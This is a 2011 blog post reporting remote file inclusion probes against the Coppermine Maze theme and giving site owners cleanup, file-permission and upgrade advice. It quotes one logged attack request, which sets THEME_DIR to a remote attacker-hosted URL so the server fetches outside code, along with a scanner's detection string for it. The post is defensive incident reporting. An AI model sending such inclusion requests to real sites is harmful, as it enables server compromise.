Huge Coppermine Maze Theme Attack on Aug 21-22, 2011
I have detected a huge exploit probe attack against the Maze theme interface for Coppermine web photo galleries, targeting my blog. Hundreds of probes were launched tonight, August 21 through 22, 2011, from the IP address 64.31.60.72 - a static IP which belongs to Limestone Networks, in Dallas, Texas.
Here is a tiny excerpt of the attack, meant to exploit a vulnerability in the Coppermine-Maze Theme, to include hostile files and codes into a blog, or photo gallery, via a vulnerable and unpatched Coppermine theme:
64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
You will note that the URL where the exploit code is hosted is shown to be http://184.22.121.212 - which resolves to 184-22-121-212.static.hostnoc.net. The exploit is defined in the RFI (Remote File Inclusion) Vulnerabilities Scanner, at the OSSEC Wiki, as: "$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";" That exploit code has been in the wild since April 2004, according to Security Tracker.
If you are running the Coppermine Photo Gallery software on a website under your control, check your access logs to see if you have been hit by this attack. Then, look at the server response codes and see if any are code 200. If so, you are probably hacked. I feed them a Server 405: Method Not Allowed.Next, log into your Coppermine admin panel and go over every setting to see what, if anything has been changed without your knowledge. Visit your gallery, using Firefox, with the NoScript add-on installed and active. View the Source code of your Gallery web pages and press Control + A to highlight all text and codes. Look for 1x1 px iframes with links to outside websites and other bad codes, like JavaScript or meta refresh redirects.
Remove any hostile changes, then save the cleaned pages. Check your server permissions to make sure that they are not writable by the World; just the Owner (You). 644 is safest (Read-Write for Owner - Read-Read for Group and World) permission, for html, script, and php files. Seek updates for Coppermine and for any themes you are using with it. Notify your web host of the exploit and have them run a vulnerability scan on your remaining pages and clean up anything you overlooked.
If you use an FTP client to upload files to your website, you can establish permissions on each remote file. Check the Help file that is part of the FTP program. If you use WS_FTP, on a Linux/Unix host, there is a right-click option labeled Properties, which opens a box that sets the numeric or actions permissions for any selected file, or group of selected files. Clicking OK after changing permissions makes the change take. If you see PHP or HTML files with 664, or 666 permissions, change them to 644, unless you know that they are safe to be left writable by the World (aka: Everyone) and Group.
If you use a web interface to manage files on your server, check the instructions for how to set or change file permissions on the server.
According to the Coppermine home page news, the latest stable version containing security patches is cpg1.5.12 (Security release - upgrade mandatory!), dated 02 January 2011. There is a very recent maintenance release: cpg1.5.14, dated August 1, 2011. I advise you to upgrade to the latest version on the Coppermine home page, if you have any older version number. Get on their mailing list to be notified about security updates, as they are issued.
Stay safe and keep your website safe for your visitors. As a Webmaster you must practice safe Hex! Do not assume that you web host will update software you have chosen to install. They won't do anything except shut down your account when it gets reported for infecting innocent visitors. If you don't know how to update web software, call your web host, ask for technical support and request assistance updating your galleries, blogs, themes, etc. They may charge you a fee, or not. You install it, you update it! It gets hacked, you fix it!
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.